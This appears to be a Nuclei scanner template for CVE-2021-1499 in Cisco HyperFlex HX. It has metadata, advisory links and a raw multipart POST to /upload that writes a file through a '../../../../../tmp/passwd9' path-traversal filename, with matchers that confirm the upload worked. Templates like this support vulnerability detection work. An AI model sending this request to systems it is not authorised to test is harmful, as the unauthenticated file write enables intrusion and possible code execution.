id: CVE-2021-1499 info: name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload author: gy741 severity: medium description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user. impact: | Allows an attacker to upload and execute arbitrary files on the target system remediation: | Apply the necessary security patches or updates provided by Cisco reference: - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz - http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2021-1499 - https://github.com/Z0fhack/Goby_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2021-1499 cwe-id: CWE-306 epss-score: 0.96279 epss-percentile: 0.99533 cpe: cpe:2.3:h:cisco:hyperflex_hx220c_af_m5:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cisco product: hyperflex_hx220c_af_m5 tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco http: - raw: - | POST /upload HTTP/1.1 Host: {{Hostname}} Accept: */* Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583 Origin: {{RootURL}} Referer: {{RootURL}} -----------------------------253855577425106594691130420583 Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9" Content-Type: application/json MyPasswdNewData->/api/tomcat -----------------------------253855577425106594691130420583-- matchers-condition: and matchers: - type: word words: - '{"result":' - '"filename:' - '/tmp/passwd9' condition: and - type: word part: header words: - "application/json" - type: status status: - 200 # digest: 490a00463044022047a94956d0dce5fbe975b4a114d42b880079fb3bc63eb98ed3c8cd812fb2ae7602206c830f63a53f40ebb1e75f05b66028bd7a139bc67c7cb3b2b12ebf01275be12a:922c64590222798bb761d5b6d8e72950